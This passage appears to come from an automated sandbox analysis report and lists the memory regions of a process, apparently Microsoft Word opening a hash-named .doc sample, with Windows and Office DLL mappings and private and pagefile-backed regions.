"c:\\windows\\syswow64\\d3d10_1.dll") Region: id = 409 start_va = 0x6a690000 end_va = 0x6a7a7fff monitored = 0 entry_point = 0x6a6940b1 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\msptls.dll") Region: id = 410 start_va = 0x6a7b0000 end_va = 0x6a7f3fff monitored = 0 entry_point = 0x6a7caaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 411 start_va = 0x6a800000 end_va = 0x6a80efff monitored = 0 entry_point = 0x6a802a50 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 412 start_va = 0x6a810000 end_va = 0x6ab98fff monitored = 0 entry_point = 0x6a8acc60 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 413 start_va = 0x6aba0000 end_va = 0x6b951fff monitored = 0 entry_point = 0x6aba1000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll") Region: id = 414 start_va = 0x6b960000 end_va = 0x6b97cfff monitored = 0 entry_point = 0x6b967240 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\SysWOW64\\sppc.dll" (normalized: "c:\\windows\\syswow64\\sppc.dll") Region: id = 415 start_va = 0x6b980000 end_va = 0x6b99ffff monitored = 0 entry_point = 0x6b992810 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 416 start_va = 0x6b9a0000 end_va = 0x6b9a5fff monitored = 0 entry_point = 0x6b9a1490 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\SysWOW64\\msimg32.dll" (normalized: "c:\\windows\\syswow64\\msimg32.dll") Region: id = 417 start_va = 0x6b9b0000 end_va = 0x6bf47fff monitored = 0 entry_point = 0x6b9b1000 region_type = mapped_file name = "mso99lwin32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso99lwin32client.dll") Region: id = 418 start_va = 0x6bf50000 end_va = 0x6c664fff monitored = 0 entry_point = 0x6bf51000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 419 start_va = 0x6c670000 end_va = 0x6c971fff monitored = 0 entry_point = 0x6c671000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 420 start_va = 0x6c980000 end_va = 0x6cb54fff monitored = 0 entry_point = 0x6c981000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 421 start_va = 0x6cb60000 end_va = 0x6d751fff monitored = 0 entry_point = 0x6cb61000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\OART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\oart.dll") Region: id = 422 start_va = 0x6d760000 end_va = 0x6d7cffff monitored = 0 entry_point = 0x6d79ec20 region_type = mapped_file name = "msvcp140.dll" filename = "\\Windows\\SysWOW64\\msvcp140.dll" (normalized: "c:\\windows\\syswow64\\msvcp140.dll") Region: id = 423 start_va = 0x6d7d0000 end_va = 0x6d93afff monitored = 0 entry_point = 0x6d83e360 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll") Region: id = 424 start_va = 0x6d940000 end_va = 0x6f5a1fff monitored = 0 entry_point = 0x6d941000 region_type = mapped_file name = "wwlib.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\WWLIB.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\wwlib.dll") Region: id = 425 start_va = 0x6f5b0000 end_va = 0x6f690fff monitored = 0 entry_point = 0x6f5de6b0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\SysWOW64\\ucrtbase.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase.dll") Region: id = 426 start_va = 0x6f6a0000 end_va = 0x6f6b3fff monitored = 0 entry_point = 0x6f6ae290 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\SysWOW64\\vcruntime140.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140.dll") Region: id = 427 start_va = 0x6f6c0000 end_va = 0x6f8aefff monitored = 0 entry_point = 0x6f705e20 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\SysWOW64\\msxml6.dll" (normalized: "c:\\windows\\syswow64\\msxml6.dll") Region: id = 428 start_va = 0x6f8b0000 end_va = 0x6f8dcfff monitored = 0 entry_point = 0x6f8c2b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 429 start_va = 0x6fc60000 end_va = 0x6fdaafff monitored = 0 entry_point = 0x6fcc1660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 430 start_va = 0x6fdb0000 end_va = 0x6fde2fff monitored = 0 entry_point = 0x6fdc0e70 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 431 start_va = 0x6fdf0000 end_va = 0x6fdf9fff monitored = 0 entry_point = 0x6fdf3200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 432 start_va = 0x6ff10000 end_va = 0x70127fff monitored = 0 entry_point = 0x6ffb97b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\SysWOW64\\d3d10warp.dll" (normalized: "c:\\windows\\syswow64\\d3d10warp.dll") Region: id = 433 start_va = 0x70640000 end_va = 0x7070cfff monitored = 0 entry_point = 0x706929c0 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\SysWOW64\\twinapi.appcore.dll" (normalized: "c:\\windows\\syswow64\\twinapi.appcore.dll") Region: id = 434 start_va = 0x70710000 end_va = 0x707b6fff monitored = 0 entry_point = 0x70746240 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\SysWOW64\\dcomp.dll" (normalized: "c:\\windows\\syswow64\\dcomp.dll") Region: id = 435 start_va = 0x707c0000 end_va = 0x709d9fff monitored = 0 entry_point = 0x70855550 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\SysWOW64\\d3d11.dll" (normalized: "c:\\windows\\syswow64\\d3d11.dll") Region: id = 436 start_va = 0x70ae0000 end_va = 0x70b62fff monitored = 0 entry_point = 0x70b037c0 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\SysWOW64\\dxgi.dll" (normalized: "c:\\windows\\syswow64\\dxgi.dll") Region: id = 437 start_va = 0x70b70000 end_va = 0x70d60fff monitored = 0 entry_point = 0x70c53cd0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 438 start_va = 0x70d70000 end_va = 0x711fdfff monitored = 0 entry_point = 0x710fa320 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\SysWOW64\\d2d1.dll" (normalized: "c:\\windows\\syswow64\\d2d1.dll") Region: id = 439 start_va = 0x713a0000 end_va = 0x713bcfff monitored = 0 entry_point = 0x713a3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 440 start_va = 0x71560000 end_va = 0x7157afff monitored = 0 entry_point = 0x71569050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 441 start_va = 0x72cb0000 end_va = 0x72d24fff monitored = 0 entry_point = 0x72ce9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 442 start_va = 0x72dd0000 end_va = 0x72fdefff monitored = 0 entry_point = 0x72e7b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 443 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 444 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 445 start_va = 0x73f20000 end_va = 0x73f2efff monitored = 0 entry_point = 0x73f22e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 446 start_va = 0x73f30000 end_va = 0x73f8efff monitored = 0 entry_point = 0x73f34af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 447 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 448 start_va = 0x74340000 end_va = 0x743c3fff monitored = 0 entry_point = 0x74366220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 449 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 450 start_va = 0x74520000 end_va = 0x745acfff monitored = 0 entry_point = 0x74569b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 451 start_va = 0x745b0000 end_va = 0x74aa8fff monitored = 0 entry_point = 0x747b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 452 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 453 start_va = 0x74dc0000 end_va = 0x74eaafff monitored = 0 entry_point = 0x74dfd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 454 start_va = 0x74eb0000 end_va = 0x762aefff monitored = 0 entry_point = 0x7506b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 455 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 456 start_va = 0x76470000 end_va = 0x764b3fff monitored = 0 entry_point = 0x76477410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 457 start_va = 0x764e0000 end_va = 0x765fefff monitored = 0 entry_point = 0x76525980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 458 start_va = 0x76600000 end_va = 0x7667afff monitored = 0 entry_point = 0x7661e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 459 start_va = 0x76680000 end_va = 0x76711fff monitored = 0 entry_point = 0x766b8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 460 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 461 start_va = 0x76800000 end_va = 0x76836fff monitored = 0 entry_point = 0x76803b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 462 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 463 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 464 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 465 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 466 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 467 start_va = 0x76d00000 end_va = 0x76d44fff monitored = 0 entry_point = 0x76d1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 468 start_va = 0x76d50000 end_va = 0x76d5bfff monitored = 0 entry_point = 0x76d53930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 469 start_va = 0x77170000 end_va = 0x771c9fff monitored = 0 entry_point = 0x77197e70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\SysWOW64\\coml2.dll" (normalized: "c:\\windows\\syswow64\\coml2.dll") Region: id = 470 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 471 start_va = 0x7fea0000 end_va = 0x7feaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fea0000" filename = "" Region: id = 472 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 473 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 474 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 475 start_va = 0x7fff0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 476 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 477 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 478 start_va = 0x717a0000 end_va = 0x7191dfff monitored = 0 entry_point = 0x7181c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 479 start_va = 0x73b80000 end_va = 0x73e4afff monitored = 0 entry_point = 0x73dbc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 480 start_va = 0xbf0000 end_va = 0xbf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bf0000" filename = "" Region: id = 481 start_va = 0xf370000 end_va = 0xf76ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f370000" filename = "" Region: id = 482 start_va = 0xf770000 end_va = 0xfbebfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "3c59aab375e8ebf7a3da914e7f1f38c6c54947b4c27c73c5c591ab27152dfe4d.doc947b4c27c73c5c591ab27152dfe4ddoc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3c59aab375e8ebf7a3da914e7f1f38c6c54947b4c27c73c5c591ab27152dfe4d.doc947b4c27c73c5c591ab27152dfe4ddoc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3c59aab375e8ebf7a3da914e7f1f38c6c54947b4c27c73c5c591ab27152dfe4d.doc947b4c27c73c5c591ab27152dfe4ddoc") Region: id = 483 start_va = 0x69840000 end_va = 0x69849fff monitored = 0 entry_point = 0x69842a34 region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\wordcnvpxy.cnv") Region: id = 484 start_va = 0x69840000 end_va = 0x69849fff monitored = 0 entry_point = 0x69842a34 region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\wordcnvpxy.cnv") Region: id = 485 start_va = 0x69840000 end_va = 0x6984bfff monitored = 0 entry_point = 0x698428fd region_type = mapped_file name = "recovr32.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\recovr32.cnv") Region: id = 486 start_va = 0x69820000 end_va = 0x6983ffff monitored = 0 entry_point = 0x6982c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 487 start_va = 0x69810000 end_va = 0x69841fff monitored = 0 entry_point = 0x6982c742 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 488 start_va = 0x697f0000 end_va = 0x6980ffff monitored = 0 entry_point = 0x697fc7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 489 start_va = 0x69810000 end_va = 0x6984efff monitored = 0 entry_point = 0x69834c50 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 490 start_va = 0x697f0000 end_va = 0x6980ffff monitored = 0 entry_point = 0x697fc7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 491 start_va = 0x69810000 end_va = 0x69841fff monitored = 0 entry_point = 0x6982c742 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 492 start_va = 0x697f0000 end_va = 0x6980ffff monitored = 0 entry_point = 0x697fc7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 493 start_va = 0xf370000 end_va = 0xf76ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f370000" filename = "" Region: id = 494 start_va = 0xf770000 end_va = 0xfbebfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "3c59aab375e8ebf7a3da914e7f1f38c6c54947b4c27c73c5c591ab27152dfe4d.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3c59aab375e8ebf7a3da914e7f1f38c6c54947b4c27c73c5c591ab27152dfe4d.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3c59aab375e8ebf7a3da914e7f1f38c6c54947b4c27c73c5c591ab27152dfe4d.doc") Region: id = 495 start_va = 0x69810000 end_va = 0x6984efff monitored = 0 entry_point = 0x69834c50 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 496 start_va = 0x697f0000 end_va = 0x6980ffff monitored = 0 entry_point = 0x697fc7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 497 start_va = 0xf370000 end_va = 0xf76ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f370000" filename = "" Region: id = 498 start_va = 0xce50000 end_va = 0xd08dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "3c59aab375e8ebf7a3da914e7f1f38c6c54947b4c27c73c5c591ab27152dfe4d.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3c59aab375e8ebf7a3da914e7f1f38c6c54947b4c27c73c5c591ab27152dfe4d.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3c59aab375e8ebf7a3da914e7f1f38c6c54947b4c27c73c5c591ab27152dfe4d.doc") Region: id = 499 start_va = 0xf370000 end_va = 0xf76ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f370000" filename = "" Region: id = 500 start_va = 0xf770000 end_va = 0xfbebfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "3c59aab375e8ebf7a3da914e7f1f38c6c54947b4c27c73c5c591ab27152dfe4d.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3c59aab375e8ebf7a3da914e7f1f38c6c54947b4c27c73c5c591ab27152dfe4d.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3c59aab375e8ebf7a3da914e7f1f38c6c54947b4c27c73c5c591ab27152dfe4d.doc") Region: id = 501 start_va = 0x69810000 end_va = 0x69841fff monitored = 0 entry_point = 0x6982c742 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 502 start_va = 0x697f0000 end_va = 0x6980ffff monitored = 0 entry_point = 0x697fc7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 503 start_va = 0xf370000 end_va = 0xf76ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f370000" filename = "" Region: id = 504 start_va = 0xf770000 end_va = 0xfbebfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "3c59aab375e8ebf7a3da914e7f1f38c6c54947b4c27c73c5c591ab27152dfe4d.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3c59aab375e8ebf7a3da914e7f1f38c6c54947b4c27c73c5c591ab27152dfe4d.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3c59aab375e8ebf7a3da914e7f1f38c6c54947b4c27c73c5c591ab27152dfe4d.doc") Region: id = 505 start_va = 0x69810000 end_va = 0x6984efff monitored = 0 entry_point = 0x69834c50 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 506 start_va = 0x697f0000 end_va = 0x6980ffff monitored = 0 entry_point = 0x697fc7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 507 start_va = 0xf370000 end_va = 0xf76ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f370000" filename = "" Region: id = 508 start_va = 0xce50000 end_va = 0xd08dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "3c59aab375e8ebf7a3da914e7f1f38c6c54947b4c27c73c5c591ab27152dfe4d.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3c59aab375e8ebf7a3da914e7f1f38c6c54947b4c27c73c5c591ab27152dfe4d.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3c59aab375e8ebf7a3da914e7f1f38c6c54947b4c27c73c5c591ab27152dfe4d.doc") Region: id = 509 start_va = 0xf370000 end_va = 0xf76ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f370000" filename = "" Region: id = 510 start_va = 0xf770000 end_va = 0xfbebfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "3c59aab375e8ebf7a3da914e7f1f38c6c54947b4c27c73c5c591ab27152dfe4d.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3c59aab375e8ebf7a3da914e7f1f38c6c54947b4c27c73c5c591ab27152dfe4d.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3c59aab375e8ebf7a3da914e7f1f38c6c54947b4c27c73c5c591ab27152dfe4d.doc") Region: id = 511 start_va = 0xf370000 end_va = 0xf76ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f370000" filename = "" Region: id = 512 start_va = 0xf370000 end_va = 0xfb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f370000" filename = "" Region: id = 513 start_va = 0xfb70000 end_va = 0xff3efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb70000" filename = "" Region: id = 514 start_va = 0xff40000 end_va = 0x10310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ff40000" filename = "" Region: id = 515 start_va = 0xce50000 end_va = 0xd03efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce50000" filename = 